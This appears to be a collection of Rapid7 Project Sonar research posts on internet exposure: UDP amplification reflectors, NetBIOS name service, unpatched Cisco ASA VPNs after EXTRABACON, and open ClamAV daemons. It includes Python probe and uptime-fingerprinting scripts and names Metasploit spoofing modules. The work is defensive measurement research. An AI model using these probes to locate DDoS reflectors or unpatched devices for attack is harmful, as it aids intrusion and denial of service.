UDP amplification attacks against the Routing Information Protocol version 1 (RIPv1) involve sending a specially crafted request that will result in RIP responding with 20 bytes of data for every route it knows about, with up to 25 routes per response for a maximum response size of 504 bytes. RIP instances with more than 25 routes will split responses over multiple packets, adding packet amplification pains to the mix. The responses can be found here in files with the -ripv1-520.csv.gz suffix. In the most recent run of this newly added study on 10/21/2016, 17,428 endpoints responded.
Metasploit modules
Rapid7's Metasploit has coverage for a variety of these UDP amplification vulnerabilities built into "scanner" modules available to both the base metasploit-framework as well as the Metasploit Community and Professional editions via:
auxiliary/scanner/chargen/chargen_probe: this module probes endpoints for the chargen service, which suffers from a UDP amplification vulnerability inherent in its design.
auxiliary/scanner/dns/dns_amp: in its default mode, this module will send an ANY query for isc.org to the target endpoints, which is similar to the query used while abusing DNS as part of DRDoS attacks.
auxiliary/scanner/ntp/ntp_monlist: this module sends the NTP MON_GETLIST request, which will return all configured/connected NTP peers from the NTP endpoint in question. This behavior can be abused as part of UDP amplification attacks and is described in more detail in US-CERT TA14-031a and CVE-2013-5211.
auxiliary/scanner/ntp/ntp_readvar: this module sends the NTP READVAR request, the response to which can be used as part of UDP amplification attacks in certain situations.
auxiliary/scanner/ntp/ntp_peer_list_dos: utilizes the NTP PEER_LIST request to test the NTP endpoint for the UDP amplification vulnerability described in R7-2014-12.
auxiliary/scanner/ntp/ntp_peer_list_sum_dos: utilizes the NTP PEER_LIST_SUM request to test the NTP endpoint for the UDP amplification vulnerability described in R7-2014-12.
auxiliary/scanner/ntp/ntp_req_nonce_dos: utilizes the NTP REQ_NONCE request to test the NTP endpoint for the UDP amplification vulnerability described in R7-2014-12.
auxiliary/scanner/ntp/ntp_reslist_dos: utilizes the NTP GET_RESTRICT request to test the NTP endpoint for the UDP amplification vulnerability described in R7-2014-12.
auxiliary/scanner/ntp/ntp_unsettrap_dos: utilizes the NTP UNSETTRAP request to test the NTP endpoint for the UDP amplification vulnerability described in R7-2014-12.
auxiliary/scanner/portmap/portmap_amp: this module has the ability to send three different portmap requests similar to those described previously, each of which has the potential to be abused for UDP amplification purposes.
auxiliary/scanner/upnp/ssdp_amp: this module has the ability to send two different M-SEARCH requests that demonstrate UDP amplification vulnerabilities inherent in SSDP. Each of these modules uses the Msf::Auxiliary::UDPScanner mixin to support scanning multiple hosts at the same time. Most send probes and analyze the responses with the Msf::Auxiliary::DRDoS mixin to automatically calculate any amplification based on a high level analysis of the request/response datagram(s). Here is an example run of auxiliary/scanner/ntp/ntp_monlist: msf auxiliary(ntp_monlist) > run [+] 192.168.33.127:123 NTP monlist request permitted (5 entries) [+] 192.168.32.139:123 NTP monlist request permitted (4 entries) [+] 192.168.32.139:123 - Vulnerable to NTP Mode 7 monlist DRDoS (CVE-2013-5211): No packet amplification and a 37x, 288-byte bandwidth amplification [+] 192.168.33.127:123 - Vulnerable to NTP Mode 7 monlist DRDoS (CVE-2013-5211): No packet amplification and a 46x, 360-byte bandwidth amplification [+] 192.168.32.138:123 NTP monlist request permitted (31 entries) [+] 192.168.33.128:123 NTP monlist request permitted (23 entries) [+] 192.168.32.138:123 - Vulnerable to NTP Mode 7 monlist DRDoS (CVE-2013-5211): 6x packet amplification and a 285x, 2272-byte bandwidth amplification [+] 192.168.33.128:123 - Vulnerable to NTP Mode 7 monlist DRDoS (CVE-2013-5211): 4x packet amplification and a 211x, 1680-byte bandwidth amplification [+] 192.168.33.200:123 - Vulnerable to NTP Mode 7 monlist DRDoS (CVE-2013-5211): 2x packet amplification and a 2x, 8-byte bandwidth amplification [*] Scanned 256 of 512 hosts (50% complete) [+] 192.168.33.251:123 NTP monlist request permitted (10 entries) [+] 192.168.33.251:123 - Vulnerable to NTP Mode 7 monlist DRDoS (CVE-2013-5211): 2x packet amplification and a 92x, 728-byte bandwidth amplification [+] 192.168.33.254:123 - Vulnerable to NTP Mode 7 monlist DRDoS (CVE-2013-5211): 2x packet amplification and a 2x, 8-byte bandwidth amplification [*] Scanned 512 of 512 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(ntp_monlist) > There is also the auxiliary/scanner/udp/udp_amplification module recently added as part of metasploit-framework PR 7489 that is designed to help explore UDP amplification vulnerabilities and audit for the presence of existing ones. Nexpose coverage Rapid7's Nexpose product has coverage for all of the ntp vulnerabilities described above and in R7-2014-12, along with: netbios-nbstat-amplification dns-amplification chargen-amplification qotd-amplification quake-amplification steam-amplification upnp-ssdp-amplification snmp-amplification Additional information about Nexpose's capabilities with regards to UDP amplification vulnerabilities can be found here. Future Research UDP amplification vulnerabilities have been lingering since the publication of RFC 768 in 1980, but only in the last couple of years have they really become a problem.  Whether current and historical efforts to mitigate the impact that attacks involving UDP amplification have been effective is certainly debatable.  Recent events have shown that only very well fortified assets can survive DDoS attacks and UDP amplification still plays a significant role.  It is our hope that the open dissemination of active scan data through projects like Sonar and the availability of tools for detecting the presence of this class of vulnerability will serve as a valuable tool in the fight against DDoS. 
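If you want a feel for what those modules measure without firing up msfconsole, here is a rough Python analogue of the bookkeeping the Msf::Auxiliary::DRDoS mixin performs. The target address is a placeholder; only point this at services you own or are explicitly authorized to test:

```python
import socket
import time

def measure_udp_amplification(host: str, port: int, probe: bytes, wait: float = 2.0) -> None:
    """Send a single UDP probe and tally the datagrams/bytes returned within `wait` seconds."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(0.5)
    sock.sendto(probe, (host, port))

    packets, total_bytes = 0, 0
    deadline = time.monotonic() + wait
    while time.monotonic() < deadline:
        try:
            data, _ = sock.recvfrom(65535)
        except socket.timeout:
            continue
        packets += 1
        total_bytes += len(data)
    sock.close()

    sent = max(len(probe), 1)
    print(f"sent {sent} bytes / 1 packet, got back {total_bytes} bytes / {packets} packets")
    print(f"~{total_bytes / sent:.1f}x bandwidth and ~{packets}x packet amplification")

# Example: a 1-byte datagram to chargen (19/udp) on a lab host.
# 192.0.2.10 is a documentation address standing in for your own test system.
measure_udp_amplification("192.0.2.10", 19, b"\x00")
```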
If you are interested in collaborating on Metasploit modules for detecting other UDP amplification vulnerabilities, submit a Metasploit PR. If you are interested in having Sonar perform additional relevant studies, have an interest in related research, or if you have questions, we welcome your comments here as well as by reaching out to us at research@rapid7.com. Enjoy!

Sonar NetBIOS Name Service Study

For the past several years, Rapid7's Project Sonar has been performing studies that explore the exposure of the NetBIOS name service on the public IPv4 Internet.  This post serves to describe the particulars behind the study and provide tools and data for future research in…

For the past several years, Rapid7's Project Sonar has been performing studies that explore the exposure of the NetBIOS name service on the public IPv4 Internet.  This post serves to describe the particulars behind the study and provide tools and data for future research in this area. Protocol Overview Originally conceived in the early 1980s, NetBIOS is a collection of services that allows applications running on different nodes to communicate over a network.  Over time, NetBIOS was adapted to operate on various network types including IBM's PC Network, token ring, Microsoft's MS-Net, Novell NetWare IPX/SPX, and ultimately TCP/IP. For purposes of this document, we will be discussing NetBIOS over TCP/IP (NBT), documented in RFC 1001 and RFC 1002. NBT is comprised of three services: A name service for name resolution and registration (137/UDP and 137/TCP) A datagram service for connectionless communication (138/UDP) A session service for session-oriented communication (139/TCP) The UDP variant of the NetBIOS over TCP/IP Name service on 137/UDP, NBNS, sometimes referred to as WINS (Windows Internet Name Service), is the focus of this study.  NBNS provides services related to NetBIOS names for NetBIOS-enabled nodes and applications.  The core functionality of NBNS includes name querying and registration capabilities and is similar in functionality and on-the-wire format to DNS but with several NetBIOS/NBNS specific details. Although NetBIOS (and, in turn, NBNS) are predominantly spoken by Microsoft Windows systems, it is also very common to find this service active on OS X systems (netbiosd and/or Samba), Linux/UNIX systems (Samba) and all manner of printers, scanners, multi-function devices, storage devices, etc.  Fire up wireshark or tcpdump on nearly any network that contains or regularly services Windows systems and you will almost certainly see NBNS traffic everywhere: The history of security issues with NBNS reads much like that of DNS.  Unauthenticated and communicated over a connectionless medium, some attacks against NBNS include: Information disclosure relating to generally internal/private names and addresses Name spoofing, interception, and cache poisoning. While not exhaustive, some notable security issues relating to NBNS include: Abusing NBNS to attack the Web Proxy Auto-Discovery (WPAD) feature of Microsoft Windows to perform man-in-the-middle attacks, resulting in [MS09-008](https://technet.microsoft.com/library/ security/ms09-008)/CVE-2009-0094. Hot Potato, which leveraged WPAD abuse via NBNS in combination with other techniques to achieve privilege escalation on Windows 7 and above. BadTunnel, which utilized NetBIOS/NBNS in new ways to perform man-in-the-middle attacks against target Windows systems, ultimately resulting in Microsoft issuing MS16-077. Abusing NBNS to perform amplification attacks as seen during DDoS attacks as warned by US-CERT's TA14-017a. Study Overview Project Sonar's study of NBNS on 137/UDP has been running for a little over two years as of the publication of this document.  For the first year the study ran once per week, but shortly thereafter it was changed to run once per month along with the other UDP studies in an effort to reduce the signal to noise ratio. The study uses a single, static, 50-byte NetBIOS "node status request" (NBSTAT) probe with a wildcard (*) scope that will return all configured names for the target NetBIOS-enabled node.  
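For the curious, here is a short Python sketch of how that 50-byte wildcard node status request is put together. It mirrors the probe described above (and used by zmap and Nmap), but it is a reconstruction from the protocol description rather than Sonar's actual implementation; the transaction ID is arbitrary:

```python
import struct

def nbstat_wildcard_probe(txn_id: int = 0x1337) -> bytes:
    """Build a NetBIOS node status (NBSTAT) request for the wildcard (*) name."""
    # NBNS header: transaction ID, flags=0 (query), one question, no other records.
    header = struct.pack(">HHHHHH", txn_id, 0x0000, 1, 0, 0, 0)

    # First-level encoding of "*" padded with NULs to 16 bytes: each byte is split
    # into two nibbles and each nibble is added to ord("A"), giving "CKAAAA...".
    name = b"*" + b"\x00" * 15
    encoded = b"".join(bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)]) for b in name)
    question = bytes([len(encoded)]) + encoded + b"\x00"  # length, name, terminator

    # Question type NBSTAT (0x0021), class IN (0x0001).
    question += struct.pack(">HH", 0x0021, 0x0001)
    return header + question

probe = nbstat_wildcard_probe()
print(len(probe))  # 50
# Sending this datagram to 137/udp on a host you are authorized to scan
# will elicit the node status reply described below.
```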
A name in this case is in reference to a particular capability a NetBIOS-enabled node has -- for example, this could (and often does) include the configured host name of the system, the workgroup/domain that it belongs to, and more.  In some cases, the presence of a particular type of name can be an indicator of the types of services a node provides.  For a more complete list of the types of names that can be seen in NBNS, see Microsoft's documentation on NetBIOS suffixes. The probe used by Sonar is identical to the probe used by zmap and the probe used by Nmap.  A Wireshark-decoded sample of this probe can be seen below: This probe is sent to all public IPv4 addresses, excluding any networks that have requested removal from Sonar's studies, leaving ~3.6b possible target addresses for Sonar.  All responses, NBNS or otherwise, are saved.  Responses that appear to be legitimate NBNS responses are decoded for further analysis. An example response from a Windows 2012 system: As a bonus for reconnaissance efforts, RFC 1002 also describes a field included at the end of the node status response that includes statistics about the NetBIOS service on the target node, and one field within here, the "Unit ID", frequently contains the ethernet or other MAC address. NetBIOS, and in particular NBNS, falls into the same bucket that many other services fall into -- they have no sufficiently valid business reason for being exposed live on the public Internet.  Lacking authentication and riding on top of a connectionless protocol, NBNS has a history of vulnerabilities and effective attacks that can put systems and networks exposing/using this service at risk.  Depending on your level of paranoia, the information disclosed by a listening NBNS endpoint may also constitute a risk. These reasons, combined with a simple, non-intrusive way of identifying NBNS endpoints on the public IPv4 Internet is why Rapid7's Project Sonar decided to undertake this study. Data, Tools and Future Research As part of Rapid7's Project Sonar, all data collected by this NBNS study is shared with the larger security community thanks to scans.io.  The past two years worth of the NBNS study's data can be found here with the -netbios-137.csv.gz  suffix.  The data is stored as GZIP-compressed CSV, each row of the CSV containing the metadata for the response elicited by the NBNS probe -- timestamp, source and destination IPv4 address, port, IP ID, TTL and, most importantly, the NBNS response (hex encoded). There are numerous ways one could start analyzing this data, but internally we do much of our first-pass analysis using GNU parallel and Rapid7's dap.  Below is an example command you could run to start your own analysis of this data.  
It utilizes dap to parse the CSV, decode the NBNS response and return the data in a more friendly JSON format: pigz -dc ~/Downloads/20160801-netbios-137.csv.gz | parallel --gnu --pipe "dap csv + select 2 8 + rename 2=ip 8=data + transform data=hexdecode + decode_netbios_status_reply data + remove data + json" As an example of some of the output you might get from this, anonymized for now: {"ip":"192.168.0.1","data.netbios_names":"MYSTORAGE:00:U WORKGROUP:00:G MYSTORAGE:20:U WORKGROUP:1d:U ","data.netbios_mac":"e5:d8:00:21:10:20","data.netbios_hname":"MYSTORAGE","data.netbios_mac_company":"UNKNOWN","data.netbios_mac_company_name":"UNKNOWN"} {"ip":"192.168.0.2","data.netbios_names":"OFFICE-PC:00:U OFFICE-PC:20:U WORKGROUP:00:G WORKGROUP:1e:G WORKGROUP:1d:U \u0001\u0002__MSBROWSE__\u0002:01:G ","data.netbios_mac":"00:1e:10:1f:8f:ab","data.netbios_hname":"OFFICE-PC","data.netbios_mac_company":"Shenzhen","data.netbios_mac_company_name":"ShenZhen Huawei Communication Technologies Co.,Ltd."} {"ip":"192.168.0.3","data.netbios_names":"DSL_ROUTE:00:U DSL_ROUTE:03:U DSL_ROUTE:20:U \u0001\u0002__MSBROWSE__\u0002:01:G WORKGROUP:1d:U WORKGROUP:1e:G WORKGROUP:00:G ","data.netbios_mac":"00:00:00:00:00:00","data.netbios_hname":"DSL_ROUTE"} There are also several Metasploit modules for exploring/exploiting NBNS in various ways: auxiliary/scanner/netbios/nbname: performs the same initial probe as the Sonar study against one or more targets but uses the NetBIOS name of the target to perform a follow-up query that will disclose the IPv4 address(es) of the target.  Useful in situations where the target is behind NAT, multi-homed, etc., and this information can potentially be used in future attacks or reconaissance. auxiliary/admin/netbios/netbios_spoof: attempts to spoof a given NetBIOS name (such as WPAD) targeted against specific system auxiliary/spoof/nbns/nbns_response: similar to netbios_spoof but listens for all NBNS requests broadcast on the local network and will attempt to spoof all names (or just a subset by way of regular expressions) auxiliary/server/netbios_spoof_nat: used to exploit BadTunnel For a protocol that has been around for over 30 years and has had its fair share of research done against it, one might think that there is no more to be discovered, but the discovery of two high profile vulnerabilities in NBNS this year (HotPotato and BadTunnel) shows that there is absolutely more to be had. If you are curious about NBNS and interested in exploring more, use the data, tools and knowledge provided above.  We'd love to hear your ideas or discoveries either here in the comments or by emailing research@rapid7.com. Enjoy!

Bringing Home The EXTRABACON [Exploit]

by Derek Abdine & Bob Rudis (photo CC-BY-SA Kalle Gustafsson) Astute readers will no doubt remember the Shadow Brokers leak of the Equation Group exploit kits and hacking tools back in mid-August. More recently, security researchers at SilentSignal noted that it was possible to modify…

by Derek Abdine & Bob Rudis (photo CC-BY-SA Kalle Gustafsson) Astute readers will no doubt remember the Shadow Brokers leak of the Equation Group exploit kits and hacking tools back in mid-August. More recently, security researchers at SilentSignal noted that it was possible to modify the EXTRABACON exploit from the initial dump to work on newer Cisco ASA (Adaptive Security Appliance) devices, meaning that virtually all ASA devices (8.x to 9.2(4)) are vulnerable and it may be interesting to dig into the vulnerability a bit more from a different perspective. Now, "vulnerable" is an interesting word to use since: the ASA device must have SNMP enabled and an attacker must have the ability to reach the device via UDP SNMP (yes, SNMP can run over TCP though it's rare to see it working that way) and know the SNMP community string an attacker must also have telnet or SSH access to the devices This generally makes the EXTRABACON attack something that would occur within an organization's network, specifically from a network segment that has SNMP and telnet/SSH access to a vulnerable device. So, the world is not ending, the internet is not broken and even if an attacker had the necessary access, they are just as likely to crash a Cisco ASA device as they are to gain command-line access to one by using the exploit. Even though there's a high probable loss magnitude1 from a successful exploit, the threat capability2 and threat event frequency3 for attacks would most likely be low in the vast majority of organizations that use these devices to secure their environments. Having said that, EXTRABACON is a pretty critical vulnerability in a core network security infrastructure device and Cisco patches are generally quick and safe to deploy, so it would be prudent for most organizations to deploy the patch as soon as they can obtain and test it. Cisco did an admirable job responding to the exploit release and has a patch ready for organizations to deploy. We here at Rapid7 Labs wanted to see if it was possible to both identify externally facing Cisco ASA devices and see how many of those devices were still unpatched. Unfortunately, most firewalls aren't going to have their administrative interfaces hanging off the public internet nor are they likely to have telnet, SSH or SNMP enabled from the internet. So, we set our sights on using Project Sonar to identify ASA devices with SSL/IPsec VPN services enabled since: users generally access corporate VPNs over the internet (so we will be able to see them) many organizations deploy SSL VPNs these days versus or in addition to IPsec (or other) VPNs (and, we capture all SSL sites on the internet via Project Sonar) these SSL VPN-enabled Cisco ASAs are easily identified We found over 50,000 Cisco ASA SSL VPN devices in our most recent SSL scan.Keeping with the spirit of our recent National Exposure research, here's a breakdown of the top 20 countries: Table 1: Device Counts by Country Country Device count % United States 25,644 50.9% Germany 3,115 6.2% United Kingdom 2,597 5.2% Canada 1,994 4.0% Japan 1,774 3.5% Netherlands 1,310 2.6% Sweden 1,095 2.2% Australia 1,083 2.2% Denmark 1,026 2.0% Italy 991 2.0% Russian Federation 834 1.7% France 777 1.5% Switzerland 603 1.2% China 535 1.1% Austria 497 1.0% Norway 448 0.9% Poland 410 0.8% Finland 404 0.8% Czech Republic 396 0.8% Spain 289 0.6% Because these are SSL VPN devices, we also have access to the certificates that organizations used to ensure confidentiality and integrity of the communications. 
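Certificate metadata is what makes that kind of attribution possible. Here is a minimal Python sketch of pulling a subject from a TLS endpoint; it assumes the third-party cryptography package, the hostname is a placeholder, and it is illustrative rather than the tooling Sonar itself uses:

```python
import ssl
from cryptography import x509  # third-party "cryptography" package (assumed dependency)

def cert_subject(host: str, port: int = 443) -> str:
    """Fetch the certificate presented on host:port and return its subject DN.
    Validation is intentionally skipped; many appliance certificates are
    self-signed or issued to internal names."""
    pem = ssl.get_server_certificate((host, port))
    cert = x509.load_pem_x509_certificate(pem.encode("ascii"))
    return cert.subject.rfc4514_string()

# "vpn.example.com" is a placeholder for an endpoint you are allowed to examine.
print(cert_subject("vpn.example.com"))
```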
Most organizations have one or two (higher availability) VPN devices deployed, but many must deploy significantly more devices for geographic coverage or capacity needs: Table 2: List of organizations with ten or more VPN ASA devices Organization Count Large Japanese telecom provider 55 Large U.S. multinational technology company 23 Large U.S. health care provider 20 Large Vietnamese financial services company 18 Large Global utilities service provider 18 Large U.K. financial services company 16 Large Canadian university 16 Large Global talent management service provider 15 Large Global consulting company 14 Large French multinational manufacturer 13 Large Brazilian telecom provider 12 Large Swedish technology services company 12 Large U.S. database systems provider 11 Large U.S. health insurance provider 11 Large U.K. government agency 10 So What? The above data is somewhat interesting on its own, but what we really wanted to know is how many of these devices had not been patched yet (meaning that they are technically vulnerable if an attacker is in the right network position). Remember, it's unlikely these organizations have telnet, SSH and SNMP enabled to the internet and researchers in most countries, including those of us here in the United States, are not legally allowed to make credentialed scan attempts on these services without permission. Actually testing for SNMP and telnet/SSH access would have let us identify truly vulnerable systems. After some bantering with the extended team (Brent Cook, Tom Sellers & jhart) and testing against a few known devices, we decided to use hping to determine device uptime from timestamps and see how many devices had been rebooted since release of the original exploits on (roughly) August 15, 2016. We modified our Sonar environment to enable hping studies and then ran the uptime scan across the target device IP list on August 26, 2016, so any system with an uptime > 12 days that has not been rebooted (or is employing some serious timestamp masking techniques) is technically vulnerable. Also remember that organizations who thought their shiny new ASA devices weren't vulnerable also became vulnerable after the August 25, 2016 SilentSignal blog post (meaning that if they thought it was reasonable not to patch and reboot it became unreasonable to think that way on August 25). So, how many of these organizations patched & rebooted? Well, nearly 12,000 (~24%) of them prevented us from capturing the timestamps. Of the remaining ones, here's how their patch status looks: We can look at the distribution of uptime in a different way with a histogram, making 6-day buckets (so we can more easily see "Day 12"): This also shows the weekly patch/reboot cadence that many organizations employ. Let's go back to our organization list and see what the mean last-reboot time is for them: Table 3: hping Scan results (2016-08-26) Organization Count Mean uptime (days) Large Japanese telecom provider 55 33 Large U.S. multinational technology company 23 27 Large U.S. health care provider 20 47 Large Vietnamese financial services company 18 5 Large Global utilities service provider 18 40 Large U.K. financial services company 16 14 Large Canadian university 16 21 Large Global talent management service provider 15 Unavailable Large Global consulting company 14 21 Large French multinational manufacturer 13 34 Large Brazilian telecom provider 12 23 Large Swedish technology services company 12 4 Large U.S. database systems provider 11 25 Large U.S. 
health insurance provider 11 Unavailable Large U.K. government agency 10 40 Two had no uptime data available and two had rebooted/likely patched since the original exploit release. Fin We ran the uptime scan after the close of the weekend (organizations may have waited until the weekend to patch/reboot after the latest exploit news) and here's how our list looked: Table 4: hping Scan Results (2016-08-29) Organization Count Mean uptime (days) Large Japanese telecom provider 55 38 Large U.S. multinational technology company 23 31 Large U.S. health care provider 20 2 Large Vietnamese financial services company 18 9 Large Global utilities service provider 18 44 Large U.K. financial services company 16 18 Large Canadian university 16 26 Large Global talent management service provider 15 Unavailable Large Global consulting company 14 25 Large French multinational manufacturer 13 38 Large Brazilian telecom provider 12 28 Large Swedish technology services company 12 8 Large U.S. database systems provider 11 26 Large U.S. health insurance provider 11 Unavailable Large U.K. government agency 10 39 Only one additional organization (highlighted) from our "top" list rebooted (likely patched) since the previous scan, but an additional 4,667 devices from the full data set were rebooted (likely patched). This bird's eye view of how organizations have reacted to the initial and updated EXTRABACON exploit releases shows that some appear to have assessed the issue as serious enough to react quickly while others have moved a bit more cautiously. It's important to stress, once again, that attackers need to have far more than external SSL access to exploit these systems. However, also note that the vulnerability is very real and impacts a wide array of Cisco devices beyond these SSL VPNs. So, while you may have assessed this as a low risk, it should not be forgotten and you may want to ensure you have the most up-to-date inventory of what Cisco ASA devices you are using, where they are located and the security configurations on the network segments with access to them. We just looked for a small, externally visible fraction of these devices and found that only 38% of them have likely been patched. We're eager to hear how organizations assessed this vulnerability disclosure in order to make the update/no update decision. So, if you're brave, drop a note in the comments or feel free to send a note to research@rapid7.com (all replies to that e-mail will be kept confidential). 1,2,3 Open FAIR Risk Taxonomy [PDF]
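For readers wondering how the uptime figures above were derived, here is a rough scapy sketch of the TCP-timestamp trick that hping relies on. It needs root privileges and permission to probe the target, the address below is a placeholder, and the accuracy depends on assumptions about the remote stack (chiefly that its timestamp counter started near zero at boot):

```python
import time
from scapy.all import IP, TCP, sr1  # requires scapy and root privileges

def tcp_tsval(dst: str, dport: int = 443) -> int:
    """Send a SYN with the TCP timestamp option and return the peer's TSval."""
    syn = IP(dst=dst) / TCP(dport=dport, flags="S", options=[("Timestamp", (1, 0))])
    resp = sr1(syn, timeout=2, verbose=False)
    if resp is None or TCP not in resp:
        raise RuntimeError("no SYN/ACK received")
    for name, value in resp[TCP].options:
        if name == "Timestamp":
            return value[0]
    raise RuntimeError("peer did not echo a TCP timestamp")

# 198.51.100.20 is a documentation address standing in for a device you own.
target = "198.51.100.20"
t1, ts1 = time.time(), tcp_tsval(target)
time.sleep(10)
t2, ts2 = time.time(), tcp_tsval(target)

hz = (ts2 - ts1) / (t2 - t1)      # remote timestamp clock rate, often 100-1000 Hz
uptime_days = ts2 / hz / 86400    # only meaningful if TSval started at ~0 at boot
print(f"~{hz:.0f} Hz timestamp clock, estimated uptime ~{uptime_days:.1f} days")
```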

Digging for Clam[AV]s with Project Sonar

A little over a week ago some keen-eyed folks discovered a feature/configuration weakness in the popular ClamAV malware scanner that makes it possible to issue administrative commands such as SCAN or SHUTDOWN remotely—and without authentication—if the daemon happens to be running on…

A little over a week ago some keen-eyed folks discovered a feature/configuration weakness in the popular ClamAV malware scanner that makes it possible to issue administrative commands such as SCAN or SHUTDOWN remotely—and without authentication—if the daemon happens to be running on an accessible TCP port. Shortly thereafter, Robert Graham unholstered his masscan tool and did a summary blog post on the extent of the issue on the public internet. The ClamAV team (which is a part of Cisco) did post a response, but the reality is that if you're running ClamAV on a server on the internet and misconfigured it to be listening on a public interface, you're susceptible to a trivial application denial of service attack and potentially susceptible to a file system enumeration attack, since anyone can try virtually every conceivable path combination and see if they get a response. Given that it has been some time since the initial revelation and discovery, we thought we'd add this as a regular scan study to Project Sonar to track the extent of the vulnerability and the cleanup progress (if any). Our first study run was completed and the following are some of the initial findings. Our study found 1,654,211 nodes responding on TCP port 3310. As we pointed out in our recent National Exposure research (and as Graham noted in his post), a great deal of this is "noise". Large swaths of IP space are configured to respond "yes" to "are you there" queries to, amongst other things, thwart scanners. However, we only used the initial, lightweight "are you there" query to determine targets for subsequent full connections and ClamAV VERSION checks. We picked up many other types of servers running on TCP port 3310, including nearly:
16,000 squid proxy servers
600 nginx servers (20,000 HTTP servers in all)
500 database servers
600 SSH servers
But, you came here to learn about the ClamAV servers, so let's dig in.
Clam Hunting
We found 5,947 systems responding with a proper ClamAV response header to the VERSION query we submitted. Only having around 6,000 exposed nodes out of over 350 million PINGable nodes is nothing to get really alarmed about. This is still an egregious configuration error, however, and if you have this daemon exposed in this same way on your internal network it's a nice target for attackers that make their way past your initial defenses. 5,947 is a small enough number that we can easily poke around at the data a bit to see if we can find any similarities or learn any lessons. Let's take a look at the distribution of the ClamAV versions: You can click on that chart to look at the details, but it's primarily there to show that virtually every ClamAV release version is accounted for in the study, with some dating back to 2004/2005. If we zoom in on the last part of the chart, we can see that almost half (2,528) of the exposed ClamAV servers are running version 0.97.5, which itself dates back to 2012. While I respect Graham's guess that these may have been unmaintained or forgotten appliances, there didn't seem to be any real pattern to them as we looked at DNS PTR records and other host metadata we collected. These all do appear to have been just "set and forget" installs, reinforcing our findings in the National Exposure report that there are virtually no barriers to entry for standing up or maintaining nodes on the internet.
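The VERSION check itself is about as simple as service probes get. Here is a minimal Python sketch of the same idea; the address is a placeholder, and you should only point this at hosts you are authorized to test:

```python
import socket

def clamav_version(host: str, port: int = 3310, timeout: float = 5.0) -> str:
    """Ask a clamd instance for its VERSION banner over TCP 3310."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        # clamd accepts newline-terminated commands prefixed with 'n'.
        sock.sendall(b"nVERSION\n")
        banner = sock.recv(4096)
    return banner.decode("utf-8", errors="replace").strip()

# 203.0.113.5 is a documentation address standing in for a host of your own.
print(clamav_version("203.0.113.5"))
# A current install answers with something along the lines of:
#   ClamAV 0.99.2/22345/Thu Oct  6 10:00:00 2016
```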
A Banner Haul Now, not all VERSION queries respond with complete banner information but over half did and said response banner contains both the version string and the last time the scanner had a signature update. Despite the poor network configuration of the nodes, 2,930 (49.3%) of them were at least current with their signatures, but 346 of them weren't, with a handful being over a decade out of "compliance." We here at Rapid7 strive to stay within the rules, so we didn't poke any deeper to try to find out the signature (or further vulnerability) status of the other ClamAV nodes. As we noted above, we performed post-scan DNS PTR queries and WHOIS queries for these nodes, but this exercise proved to be less than illuminating. These are nodes of all shapes and sizes sitting across many networks and hosting providers. There did seem to be a large commonality of these ClamAV systems running on hosts in "mom and pop" ISPs and we did see a few at businesses and educational institutions, but overall these are fairly random and probably (in some cases) even accidental ClamAV deployments. As a last exercise, we grouped the ClamAV nodes by autonomous system (AS) and tallied up the results. There was a bit of a signal here that you can clearly see in this list of the "top" 10 ASes: AS AS Name Count % 4766 KIXS-AS-KR Korea Telecom, KR 1,733 29.1% 16276 OVH, FR 513 8.6% 3786 LGDACOM LG DACOM Corporation, KR 316 5.3% 25394 MK-NETZDIENSTE-AS, DE 282 4.7% 35053 PHADE-AS, DE 263 4.4% 11994 CZIO-ASN - Cruzio, US 251 4.2% 41541 SWEB-AS Serveisweb, ES 175 2.9% 9318 HANARO-AS Hanaro Telecom Inc., KR 147 2.5% 23982 SENDB-AS-KR Dongbu District Office of Education in Seoul, KR 104 1.7% 24940 HETZNER-AS, DE 65 1.1% Over 40% of these systems are on networks within the Republic of Korea. If we group those by country instead of AS, this "geographical" signal becomes a bit stronger: Country Count % 1 Korea, Republic of 2,463 41.4% 2 Germany 830 14.0% 3 United States 659 11.1% 4 France 512 8.6% 5 Spain 216 3.6% 6 Italy 171 2.9% 7 United Kingdom 99 1.7% 8 Russian Federation 78 1.3% 9 Japan 67 1.1% 10 Brazil 62 1.0% What are some takeaways from these findings? Since there was a partial correlation to exposed ClamAV nodes being hosted in smaller ISPs it might be handy if ISPs in general offered a free or very inexpensive "hygiene check" service which could provide critical information in understandable language for less tech-savvy server owners. While this exposure is small, it does illustrate the need for implementing a robust configuration management strategy, especially for nodes that will be on the public internet. We have tools that can really help with this, but adopting solid DevOps principles with a security mindset is a free, proactive means of helping to ensure you aren't deploying toxic nodes on the internet. Patching and upgrading go hand-in-hand with configuration management and it's pretty clear almost 6,000 sites have not made this a priority. In their defense, many of these folks probably don't even know they are running ClamAV servers on the internet. Don't forget your security technologies when dealing with configuration and patch management. We cyber practitioners spend a great deal of time pontificating about the need for these processes but often times do not heed our own advice. Turn stuff off. It's unlikely the handfuls of extremely old ClamAV nodes are serving any purpose, besides being easy marks for attackers. 
They're consuming precious IPv4 space along with physical data center resources that they just don't need to be consuming. Don't assume that if your ClamAV (or any server software, really) is "just internal" that it's not susceptible to attack. Be wary of leaving egregiously open services like this available on any network node, internally or externally. Fin Many thanks to Jon Hart, Paul Deardorff & Derek Abdine for their engineering expertise on Project Sonar in support of this new study. We'll be keeping track of these ClamAV deployments and hopefully seeing far fewer of them as time goes on. Drop us a note at research@rapid7.com or post a comment here if you have any questions about this or future studies.

Rapid7 Releases New Research: The National Exposure Index

Today, I'm happy to announce the latest research paper from Rapid7, National Exposure Index: Inferring Internet Security Posture by Country through Port Scanning, by Bob Rudis, Jon Hart, and me, Tod Beardsley. This research takes a look at one of the most foundational components of…

Today, I'm happy to announce the latest research paper from Rapid7, National Exposure Index: Inferring Internet Security Posture by Country through Port Scanning, by Bob Rudis, Jon Hart, and me, Tod Beardsley. This research takes a look at one of the most foundational components of the internet: the millions and millions of individual services that live on the public IP network. When people think about "the internet," they tend to think only of the one or two protocols that the World Wide Web runs on, HTTP and HTTPS. Of course, there are loads of other services, but which are actually in use, and at what rate? How much telnet, SSH, FTP, SMTP, or any of the other protocols that run on TCP/IP is actually in use today, where are they all located, and how much of it is inherently insecure due to running over non-encrypted, cleartext channels? While projects like CAIDA and Shodan perform ongoing telemetry that covers important aspects of the internet, we here at Rapid7 are unaware of any ongoing effort to gauge the general deployment of services on public networks. So, we built our own, using Project Sonar, and we have the tooling now to not only answer these fundamental questions about the nature of the internet and come up with more precise questions for specific lines of inquiry. Can you name the top ten TCP protocols offered on the 